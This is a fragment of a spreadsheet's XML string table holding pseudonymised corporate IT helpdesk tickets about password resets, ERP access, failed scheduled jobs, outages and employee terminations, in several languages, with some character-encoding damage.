received from: lzvdyouh.imqgfadb@gmail.com
hallo,
ich kann mich nicht in das impact award programdntym  einloggen oder mein pass-wort zurÃ¼cksetzen.
mit freundlichen grÃ¼ÃŸen
lzvdyouh imqgfadb
</t>
  </si>
  <si>
    <t>lzvdyouh imqgfadb</t>
  </si>
  <si>
    <t>erp access issue : reset password for SID_37 for pandethrypv</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):
enter user id of user having the issue:
transaction code(s) the user needs or was working with:
describe the issue:
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user: pandethrypv</t>
  </si>
  <si>
    <t>folder access : s:\globalace_holemaking\ha646</t>
  </si>
  <si>
    <t xml:space="preserve">please see below in red:_x000D_
_x000D_
viele grÃ¼ÃŸe / best </t>
  </si>
  <si>
    <t>cltszugw tgzbklec</t>
  </si>
  <si>
    <t>dwxlipbo vxmgbefs</t>
  </si>
  <si>
    <t>not able to access walkme plugin</t>
  </si>
  <si>
    <t xml:space="preserve">
every time i click on the "walkme" link , i get the " upgrade plugin" message .
i get the below message in a new tab. i am not being able to access "walkme plugin" on hr_tool.
</t>
  </si>
  <si>
    <t>lqvdoijm yntmlehu</t>
  </si>
  <si>
    <t xml:space="preserve">german caller </t>
  </si>
  <si>
    <t>unable to get old mails in outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kirtyywpuo.dcksxjeq@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please note i am unable to get my old mails in the inbox. the oldest mail i can get is of 9th april 2015._x000D_
i need my old mails also as there is important data related to customers._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>kilywpuo dcksxjeq</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 10/19/2016 05:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 10/19/2016 05:25:00</t>
  </si>
  <si>
    <t>not able to open the existing hana report</t>
  </si>
  <si>
    <t>rcbdyslq zuspjbtw</t>
  </si>
  <si>
    <t>urevbjcp krcaylpz</t>
  </si>
  <si>
    <t>collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nmgesubf.wugbalmy@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
   office 365 (collaboration_platform) is not executing in my a/c,_x000D_
_x000D_
pl. help,_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">a termination for ckfobaxd wgnejyvt, 11173878, effective 09/16/2016 has been approved. </t>
  </si>
  <si>
    <t xml:space="preserve">a termination for ckfobaxd wgnejyvt, 11173878, effective 09/16/2016 has been approved. _x000D_
_x000D_
account is not yet disabled </t>
  </si>
  <si>
    <t>waste email from workflow system</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: creojvdh.ciblyskg@gmail.com_x000D_
_x000D_
hello  it helperï¼Œ_x000D_
recently i always got some email from working flow system to remind me approve pr :01456949  and 01456987, but that pr already no in erp , can you help me check "?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>creojvdh ciblyskg</t>
  </si>
  <si>
    <t>not able to take skype meetings via head phone</t>
  </si>
  <si>
    <t>laptop model : dell precision m4800</t>
  </si>
  <si>
    <t>aiprzulo lzvmgqwy</t>
  </si>
  <si>
    <t>belgium callsariving at agnwfwieszka kubiadfffk.</t>
  </si>
  <si>
    <t>there are belgium costumers calling the polish phone number of agnwfwieszka.
can we do something on it.</t>
  </si>
  <si>
    <t>kydirtgu idwzeojv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/19/2016 04:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/19/2016 04:05:00</t>
  </si>
  <si>
    <t>HostName_106:volume consumed 85% ,out of 20gb currently 3gb space  is available.</t>
  </si>
  <si>
    <t>power outage:company-na-mex-juarez-dmvpn-1811-rtr01 located at juarez mx is hard down since 2.53am et on 10/19.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______2.53am et on 10/19._______________x000D_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</si>
  <si>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lÃ¼fter defekt \industriekontrollmonitor \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>niptbwdq csenjruz</t>
  </si>
  <si>
    <t>reinstall win7 \qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>probleme mit kamera und monitor .</t>
  </si>
  <si>
    <t xml:space="preserve">guten morgen dhthykts,
um die kamera an den neuen monitor anzuschlieÃŸen benÃ¶tigen wir ein kabel von hdmi auf diesen hellgrauen anschluss am dell monitor. so ist zumindest die erste kamera aufgebaut. falls es andere alternativen gibt sind wir natÃ¼rlich auch dafÃ¼r offen.
</t>
  </si>
  <si>
    <t>unable to create delivery</t>
  </si>
  <si>
    <t xml:space="preserve">please provide the following:
what order number? 36154414
what material or item number?  6604042 item 1300
what warehouse location? plant_263
issue description / error message?
it is legal control issue, material was extended to plant plant_263 by rqfhiong zkwfqagb team, but legal control group isn't  extend automatically also, it is fert product and for poland (like for all eu) it should be set like ear99,
we have the same problem with all new materials extended to plant plant_263 and country pl(the same issue with czech republic- plant_254 and turkey- plant_163),
all materials have to be released manually by import/export managers (rlhuwmve krcfhoxj, slrgconp onukdesq, chrsddiwds dwdbertfsych),
the manually process take a lot times export team and csrs every day, and very often block invoicing and sales(tools after tests_n_demonstrations, consigment stocks),
material #6604042 is only example and will be relased manually by petqkjra, but please check the problem, find root cause and solve it, 
</t>
  </si>
  <si>
    <t>qnstifeb hybrjfex</t>
  </si>
  <si>
    <t>probleme mit fp \rechner  bleibt hÃ¤ngen \ksxchbaf rhquvzfm</t>
  </si>
  <si>
    <t>ksxchbaf rhquvzfm</t>
  </si>
  <si>
    <t>need help in changing password in password_management_tool password manager.</t>
  </si>
  <si>
    <t>wbilvncd idavhsxy</t>
  </si>
  <si>
    <t xml:space="preserve">amssm003: windows disk space utilization alert:utiliuytretion is 97%, out of 18gb currently 555 mb is available. </t>
  </si>
  <si>
    <t xml:space="preserve">amssm003: windows disk space utilization alert : utiliuytretion is 97%, out of 18gb currently 555 mb is available. </t>
  </si>
  <si>
    <t>erp SID_34 ( erp production).</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ydvmibwn.eljtsdar@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
the  response time is of erp SID_34 ( erp production) is very slow._x000D_
request you to kindly arrange to resolve it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ydvmibwn eljtsdar</t>
  </si>
  <si>
    <t>telecom_vendor_3 dongle connection issue</t>
  </si>
  <si>
    <t>telecom_vendor_3 donggle connection issue
-connected to the user system using teamviewer.
-uninstalled and reinstalled the telecom_vendor_3 dongle app.
-checked the dongle settings.
-advised the user to try and connect.no go
-user mentioned that the telecom_vendor_3 connect get connected for some time and then disconnects.
-its happening since a long time
-no :</t>
  </si>
  <si>
    <t>ojgfmvep zbatowgi</t>
  </si>
  <si>
    <t>wild card search for grade is not working in search by part number in distributor_tool</t>
  </si>
  <si>
    <t>hbmwlprq ilfvyodx</t>
  </si>
  <si>
    <t>reset passwords for soldfnbq uhnbsvqd using password_management_tool password reset.</t>
  </si>
  <si>
    <t>mein erp passwort funktioniert nicht. ich bin gesperrt.</t>
  </si>
  <si>
    <t>access needed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fwypxqcs.twsqoimy@gmail.com_x000D_
_x000D_
hello ladies and gentlemen,_x000D_
_x000D_
_x000D_
i need access to:_x000D_
_x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d229e3.a59c88e0]_x000D_
_x000D_
_x000D_
_x000D_
[cid:image004.jpg@01d229e3.a59c88e0]_x000D_
_x000D_
_x000D_
may </t>
  </si>
  <si>
    <t>fwypxqcs twsqoimy</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_485 failed in job_scheduler at: 10/19/2016 02:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_485 failed in job_scheduler at: 10/19/2016 02:31:00</t>
  </si>
  <si>
    <t>pc an der EU_tool-station 21 in germany funktioniert nicht mehr.</t>
  </si>
  <si>
    <t>pc an der EU_tool-station 21(oder bde21) in germany funktioniert nicht mehr._x000D_
anzeige schreibt festplatten fehler.</t>
  </si>
  <si>
    <t>rphoiduv hfbevpir</t>
  </si>
  <si>
    <t xml:space="preserve">verbindung zum internet server nicht mÃ¶glich wegen administrationsrechten - </t>
  </si>
  <si>
    <t>fehlermeldung in der mail,: dieser vorgang wurde wegen beschrÃ¤nkung abgebrochen. bitte wenden sie sich an den systemadministrator
kein hyperlink mÃ¶glich zu Ã¶ffnen!</t>
  </si>
  <si>
    <t>usdhpatm icgmphjk</t>
  </si>
  <si>
    <t>the</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 passowrd  </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist to reset erp SID_34 password for user kimtc.
dkklddww lqdwjdwd
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>erp account entsperren</t>
  </si>
  <si>
    <t>bitte erp account von fygrwuna gomcekzi entsperren.</t>
  </si>
  <si>
    <t>tohxswej pmnlxyrv</t>
  </si>
  <si>
    <t>delivery blocked status :blocked</t>
  </si>
  <si>
    <t>same issue with inc1561759. i have found another delivery status blocked items. please see the attached excel file for material numbers. _x000D_
plesae change status to "not blocked" otherwise we cannot create delivery note.</t>
  </si>
  <si>
    <t>nwlhcfpa zdlfmthq</t>
  </si>
  <si>
    <t>reset passwords for fygrwuna gomcekzi using password_management_tool password reset.</t>
  </si>
  <si>
    <t>bitte erp kennwort zurÃ¼cksetzen.</t>
  </si>
  <si>
    <t>quote required laptop bag &amp; projector adopter for dell latitude 7350</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
please give the quote for laptop bag &amp; projector adopter for my laptop dell latitude 7350._x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>kxmidsga zokivdfa</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2584 failed in job_scheduler at: 10/19/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2584 failed in job_scheduler at: 10/19/2016 01:30:00</t>
  </si>
  <si>
    <t>verbindung zwischen drucker em98 und pc eemw8144353 kann nicht hergestellt werden</t>
  </si>
  <si>
    <t xml:space="preserve">*deilvery block status* </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nwlhcfpa.zdlfmthq@gmail.com
hello it team,
can you please assist to create dn for the following so# 36148274 ? we cannot create delivery. i believed this is because delivery block status has been set with "blocked". need to be "not  blocked."
so# 361482744
mm#
52815092
56235173
52842204
[cid:image002.png@01d22a14.9ba833d0]
[cid:image001.jpg@01d22a11.78bb30f0]
</t>
  </si>
  <si>
    <t>netzteil oder netzstecker defekt - pc wareneingang</t>
  </si>
  <si>
    <t>bitte netzteil oder netzstecker am pc evhw8114354 (wareneingang) prÃ¼fen und ggf. reparieren._x000D_
pc lÃ¤sst sich nur nach bewegen des steckers einschalten.</t>
  </si>
  <si>
    <t>ipeajlvk idmbyztf</t>
  </si>
  <si>
    <t xml:space="preserve">account locked in erp SID_34 </t>
  </si>
  <si>
    <t>fhgmxnce jbwqivhc</t>
  </si>
  <si>
    <t>in hub , for commstorage_product-company folder , for me it is showing access denied.</t>
  </si>
  <si>
    <t>jacgtfxo vlbeuxif</t>
  </si>
  <si>
    <t>erp issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ublisodp.qydfvpgw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
when i try to create a new mm number for items with storage location plant_62, the mm number gets created under plant_228 ,even when the storage location is specified as "plant_62" in the line item._x000D_
pl rectify same._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ublisodp qydfvpgw</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00</t>
  </si>
  <si>
    <t>: insert to d/n no.</t>
  </si>
  <si>
    <t>please insert the delivery note no. in erp book</t>
  </si>
  <si>
    <t>cthaborg cahbxlmr</t>
  </si>
  <si>
    <t>t/o not generated automatically for dn 8058525297</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to check dn 9169636308,the t/o can not generated, </t>
  </si>
  <si>
    <t xml:space="preserve">ms office 365 pro plus french has  got corrupted please do the need full </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to windows account </t>
  </si>
  <si>
    <t>mqxkanzt xryzfhpe</t>
  </si>
  <si>
    <t>my mobile phone cannot be use for skype business concall.</t>
  </si>
  <si>
    <t xml:space="preserve">also my initial is wrong, the right one is waitgr chdffong, sdfgwong
</t>
  </si>
  <si>
    <t>termination for lauredwwden hwffiglhkins,</t>
  </si>
  <si>
    <t xml:space="preserve"> 
a termination for  lauredwwden hwffiglhkins, 11139101, effective 10/01/2016 has been approved. 
</t>
  </si>
  <si>
    <t>yrwvnsxq wqlfarny</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/18/2016 22:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/18/2016 22:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 10/18/2016 22:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 10/18/2016 22:18:00</t>
  </si>
  <si>
    <t>unable to access email</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist as my staff kmvwxdti uaoyhcep unable to open his email.
computer name : aswl8912729
user : kthassi65a6
dbkdwwd wdfwsggalleh
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>hello ,   a termination for phvwitud kvetadzo, 1113235650, effective 09/24/2016 has been approved</t>
  </si>
  <si>
    <t xml:space="preserve">from:  [mailto:system@hr_tool.com] 
sent: wednesday, october 19, 2016 12:52 am
to: nwfodmhc exurcwkm
subject:  the terminate action for phvwitud kvetadzo has completed.
 hello , 
a termination for phvwitud kvetadzo, 1113235650, effective 09/24/2016 has been approved. 
click the link to view. 
here 
</t>
  </si>
  <si>
    <t>nvawmlch ubyjolnc</t>
  </si>
  <si>
    <t>tracking#</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gkwcxzum.answkqpe@gmail.com
dear all
would you please do me a favor ?
plant_69 is on the customs audit and we are preparing the document.
referring to the attached file, using /pweaver/ship-manifest, i can't extract the tracking numbers based on dns.
would you please let me know if there is any way ?
can we not extract the old data ?
</t>
  </si>
  <si>
    <t>gkwcxzum answkqpe</t>
  </si>
  <si>
    <t xml:space="preserve">hello    on my order below.   i have 5  drop ships that will not inwarehouse_tool they customer.  item 50, 70, 80, 100 and 110.  </t>
  </si>
  <si>
    <t xml:space="preserve">from: pvjdtrya oevyhtdx [mailto:pvjdtrya.oevyhtdx@gmail.com] 
sent: tuesday, october 18, 2016 9:02 pm
to: nwfodmhc exurcwkm
subject: wtykmnlg xamesrpfrop ship will not inwarehouse_tools
hello 
on my order below.   i have 5  drop ships that will not inwarehouse_tool they customer.  item 50, 70, 80, 100 and 110.  po # 5616726510, 5616726518 and 5616720523.
please advise.
please update your records with my new email address:
pvjdtrya.oevyhtdx@gmail.com
zurtxjbd gaotwcfd
inside sales representative
pvjdtrya.oevyhtdx@gmail.com
</t>
  </si>
  <si>
    <t>pvjdtrya oevyhtdx</t>
  </si>
  <si>
    <t>termination for brthryian lsgthhuart</t>
  </si>
  <si>
    <t xml:space="preserve">termination for brthryian lsgthhuart
hello , 
a termination for brthryian lsgthhuart, 1115787569, effective 10/17/2016 has been approved. 
click the link to view. 
</t>
  </si>
  <si>
    <t>unable to sync mails on iphone 6s</t>
  </si>
  <si>
    <t>exchange with phone</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kiduhltr.ofrdvnux@gmail.com
hello
please can you login again my phone to server.
i changed my phone from old iphone 5s to new 6s . i want connect/get e-mails from exchange outlook on my iphone again :
iphone 6s
phone number: +
imei: 
</t>
  </si>
  <si>
    <t>kiduhltr ofrdvnux</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access erp </t>
  </si>
  <si>
    <t>ptgwfymc mchpwvgf</t>
  </si>
  <si>
    <t>ç”¨å‹è½¯ä»¶é—®é¢˜</t>
  </si>
  <si>
    <t>æ‰“å¼€å·²å…³é—­çš„é”€å”®è®¢å•æ—¶ï¼Œæ˜¾ç¤º"ä¸èƒ½åœ¨æ‰‹åŠ¨æˆ–åˆ†å¸ƒäº‹ç‰©æ–¹å¼ä¸‹åˆ›å»ºæ–°çš„é“¾æŽ¥"</t>
  </si>
  <si>
    <t>GRP_48</t>
  </si>
  <si>
    <t>bwstnmjh yqumwrsk</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_43hoti failed in job_scheduler at: 10/18/2016 18:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_43hoti failed in job_scheduler at: 10/18/2016 18:01:00</t>
  </si>
  <si>
    <t>termination for yhteijwf llwlfazo, 1117529567</t>
  </si>
  <si>
    <t xml:space="preserve">hello , 
a termination for yhteijwf llwlfazo, 1117529567, effective 10/18/2016 has been approved. 
click the link to view. 
here 
</t>
  </si>
  <si>
    <t>ticket update on inplant_870573</t>
  </si>
  <si>
    <t>suspected spam mail</t>
  </si>
  <si>
    <t xml:space="preserve">this looks like spam to me, just wanted to make someone aware._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tool data site - cannot search with out security error</t>
  </si>
  <si>
    <t>dwmnad macwdlmwkey - this is the error i am getting when i use any search function on 
system.outofmemoryexception: exception of type 'system.outofmemoryexception' was thrown. at system.reflection.runtimeassembly.getrawbytes(runtimeassembly assembly, objecthandleonstack retrawbytes) at system.reflection.runtimeassembly.getrawbytes() at system.security.policy.hash.getrawdata() at system.security.policy.hash.generatehash(type hashtype) at system.security.policy.hash.get_sha1() at system.web.handlers.scriptresourcehandler.getassemblyinfointernal(assembly assembly) at system.web.handlers.scriptresourcehandler.getassemblyinfo(assembly assembly) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.getscriptresourceurlimpl(list`1 assemblyresourcelists, boolean zip) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.system.web.handlers.iscriptresourcehandler.getscriptresourceurl(list`1 assemblyresourcelists, boolean zip) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.system.web.handlers.iscriptresourcehandler.getscriptresourceurl(assembly assembly, string resourcename, cultureinfo culture, boolean zip) at system.web.ui.scriptreference.geturlfromname(scriptmanager scriptmanager, icontrol scriptmanagercontrol, boolean zip) at system.web.ui.scriptreference.geturlinternal(scriptmanager scriptmanager, boolean zip) at system.web.ui.scriptreference.geturl(scriptmanager scriptmanager, boolean zip) at system.web.ui.scriptmanager.registeruniquescripts(list`1 uniquescripts) at system.web.ui.scriptmanager.registerscripts() at system.web.ui.scriptmanager.onpageprerendercomplete(object sender, eventargs e) at system.web.ui.page.onprerendercomplete(eventargs e) at system.web.ui.page.processrequestmain(boolean includestagesbeforeasyncpoint, boolean includestagesafterasyncpoint)</t>
  </si>
  <si>
    <t>ndyrowef biwecrgx</t>
  </si>
  <si>
    <t xml:space="preserve">password reset to login hub </t>
  </si>
  <si>
    <t>tovracdn tjnvswrq</t>
  </si>
  <si>
    <t>no display on the monitor</t>
  </si>
  <si>
    <t>vktxjamz whbdetvp</t>
  </si>
  <si>
    <t xml:space="preserve">distribution list not updating </t>
  </si>
  <si>
    <t>distribution list not updating _x000D_
removed and re added it back ..waited for some time._x000D_
it worked fine._x000D_
issue resolved.</t>
  </si>
  <si>
    <t>em event: critical:SID_37 the value of datafile size for perpsr3glovia,/oracle/SID_37/erpdata22/sr3glovia_6/sr3glovia.data6 is</t>
  </si>
  <si>
    <t xml:space="preserve">host=HostName_221.company.com _x000D_
target type=database instance _x000D_
target name=SID_37 _x000D_
categories=capacity _x000D_
message=the value of datafile size for perpsr3glovia,/oracle/SID_37/erpdata22/sr3glovia_6/sr3glovia.data6 is 26,800 _x000D_
severity=critical _x000D_
event reported time=oct 18, 2016 3:00:29 pm edt _x000D_
event type=metric alert _x000D_
event name=me$oracle_datafile_monitor:datafile_size _x000D_
</t>
  </si>
  <si>
    <t>cannot post delivery 8058506120</t>
  </si>
  <si>
    <t xml:space="preserve">cannot post delivery 9169617231.  about 153 materials were recently moved from usa warehouse to usa warehouse.  we are not able to post this delivery. get error that says this material is not maintained at plant plant_192.  plant_192 is usa alabama plant. (should have nothing to do with this).  see attached screen shots.  i am concerned that some configuration is missing to allow plant_101 to ship consignment fill up orders for this customer.  (tool flo mfg.)  these products are only to be stored in usa temporarily.  once inventory depletes, these will be shipped direct from plant_327/plant_328 plant. we cannot miss service to this customer.  please advise.  </t>
  </si>
  <si>
    <t>supply_chain_software pw</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bmudkpie.qolrvbip@gmail.com
hello,
please reset my password for supply_chain_software (user: beyhtcykea23)
best </t>
  </si>
  <si>
    <t>bmudkpie qolrvbip</t>
  </si>
  <si>
    <t>assign user "corsthroc34" to the ad ltabthrysallotcsalesman</t>
  </si>
  <si>
    <t xml:space="preserve">hello, 
pls assign user "corsthroc34" to the ad ltabthrysallotcsalesman. currently he is added to ltaballotcsalesemp but he is a sales manager. 
approved by me (if it is enough as approval). 
</t>
  </si>
  <si>
    <t>xfdkwusj gyklresa</t>
  </si>
  <si>
    <t>envoyÃ© Ã  partir de lâ€™outil capture dâ€™Ã©cran</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: orvsydzf.rbqtpdaz@gmail.com_x000D_
_x000D_
&lt;_x000D_
hello, &lt;_x000D_
 &lt;_x000D_
i haved any access to bobj, since 3 days. please could you help me.&lt;_x000D_
</t>
  </si>
  <si>
    <t>orvsydzf rbqtpdaz</t>
  </si>
  <si>
    <t xml:space="preserve">infopath installation for lean event </t>
  </si>
  <si>
    <t>' i m not able to "add a lean event" through "the webpage cannot be displayed"</t>
  </si>
  <si>
    <t>xernsfqa uzvsnlbd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1967d failed in job_scheduler at: 10/18/2016 14:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1967d failed in job_scheduler at: 10/18/2016 14:02:00</t>
  </si>
  <si>
    <t>unable to load outlook as ost file got corrupted</t>
  </si>
  <si>
    <t xml:space="preserve">unable to load outlook as ost file got corrupted
name:bthrob knrlepglper
language:
browser:microsoft internet explorer
email:xziwkgeo.gdiraveu@gmail.com
customer number:
telephone:
summary:could you please take control of my screen and let me know what is wrong with my email? </t>
  </si>
  <si>
    <t>xziwkgeo gdiraveu</t>
  </si>
  <si>
    <t>ticket update on inplant_870499</t>
  </si>
  <si>
    <t>finance portal on the hub</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qfcxbpht.oiykfzlr@gmail.com_x000D_
_x000D_
company help,_x000D_
_x000D_
i was unable to access the finance portal on the hub, even though i have done this in the past, receiving the below message.  could you please check my permissions and let me know what i need to do to reinstate?_x000D_
_x000D_
               </t>
  </si>
  <si>
    <t>qfcxbpht oiykfzlr</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access drawings </t>
  </si>
  <si>
    <t>update on inplant_868966</t>
  </si>
  <si>
    <t>network outage: south amerirtca site is hard down since  12:54 pm et on 10/18.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________12:54 pm et on 10/18.____________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __no____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____no___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____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</si>
  <si>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i don't receive any team workflows anymore into my erp inbox.</t>
  </si>
  <si>
    <t xml:space="preserve">von: ydigzqbu xdgjizek 
gesendet: dienstag, 18. oktober 2016 10:07
an: ujxvrlzg pkaegicn
betreff: workflow inbox
hello mr. thetadkg,
i hope you are the right person to turn to:
suddenly i don't reeive any team workflows anymore into my erp inbox.
i am assigned to csd 51111936 and hope you can tackle this problem.
</t>
  </si>
  <si>
    <t>ydigzqbu xdgjizek</t>
  </si>
  <si>
    <t>vip 2 // mobile device activation</t>
  </si>
  <si>
    <t>jcsmxrgl ibhsnket</t>
  </si>
  <si>
    <t xml:space="preserve">oulook not updating </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:my email is not update again</t>
  </si>
  <si>
    <t>gzhjstxr mdnsfipg</t>
  </si>
  <si>
    <t>bex is not responding</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
i have used several times in the past, but for some reason today it's not functioning properly.  i get to the point where i have chosen which table to load and then it freezes and says not responding.  i really need this to be working properly so that i can do my job.  please help, </t>
  </si>
  <si>
    <t>need access to sharepont approved by blktuiae jzakfmhw please find attachment</t>
  </si>
  <si>
    <t xml:space="preserve">need access to collaboration_platform approved by blktuiae jzakfmhw please find attachment
user  id : schddklnes,
 website- {fc868d04-e4f5-45cb-a7b8-f33b0cc5e486}&amp;file=emea%20dpo%20vendor%20payment%20terms%20-%20change%20log.xlsx&amp;action=default
</t>
  </si>
  <si>
    <t>i need my password in SID_1 changed..  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
userid walddkrrm234
mdiwjd wthaldlmdsrop
global ethics and compliance programdntys
</t>
  </si>
  <si>
    <t xml:space="preserve">skype </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eqxyvfpi.gbaljypo@gmail.com_x000D_
_x000D_
hi â€“ i have been unable to load my picture in skype â€“ when i try to edit, it takes me to my account and does not load â€“_x000D_
i have added in outlook, but does not show up in skype â€“_x000D_
any ideas? â€“_x000D_
</t>
  </si>
  <si>
    <t>eqxyvfpi gbaljypo</t>
  </si>
  <si>
    <t>printer issue : hp office jet printer offline.</t>
  </si>
  <si>
    <t>not able to clear printer queue_x000D_
cleared queue by command prompt and checked giving a uacyltoe hxgaycze print, it worked fine._x000D_
issue resolved.</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze call from benethrytte cthoursook</t>
  </si>
  <si>
    <t>expense report submittal : refer ticket # : inplant_855783</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ytqhfmwi.itnakpmc@gmail.com_x000D_
_x000D_
i've attempted to submit this expense report (below) for approval and it does not appear to be moving on to approver, it only saves the report._x000D_
_x000D_
this happens every time i submit an expense report._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ytqhfmwi itnakpmc</t>
  </si>
  <si>
    <t>bplnyedg vobluewg placed a uacyltoe hxgaycze call : id :  1064871377</t>
  </si>
  <si>
    <t>efbwiadp dicafxhv</t>
  </si>
  <si>
    <t xml:space="preserve">my email keeps disconnecting and i have not had internet access at all this week. </t>
  </si>
  <si>
    <t xml:space="preserve">from: wjslkzfr jxlbzwrp 
sent: tuesday, october 18, 2016 5:59 pm
to: nwfodmhc exurcwkm
subject:  - re: email and internet browser 
importance: high
hello, 
please help me.
my email keeps disconnecting and i have not had internet access at all this week. 
</t>
  </si>
  <si>
    <t>no access to appreciatehub</t>
  </si>
  <si>
    <t>i have no access to appreciatehub.com. it says "you may not yet be authorized to enter employee recognition site. please contact your admin..."</t>
  </si>
  <si>
    <t>asktjmqe yfwbzleo</t>
  </si>
  <si>
    <t>ghost call with interaction id-1064870877</t>
  </si>
  <si>
    <t>blank call // call came and got disconnected</t>
  </si>
  <si>
    <t>id : 1064870825</t>
  </si>
  <si>
    <t xml:space="preserve">id : 2175981936_x000D_
_x000D_
person on other side disconnected </t>
  </si>
  <si>
    <t>outlook not updating</t>
  </si>
  <si>
    <t>problem with kpm time keeping and e-time</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zywoxerf.paqxtrfk@gmail.com
dear sir:
i have two issues:
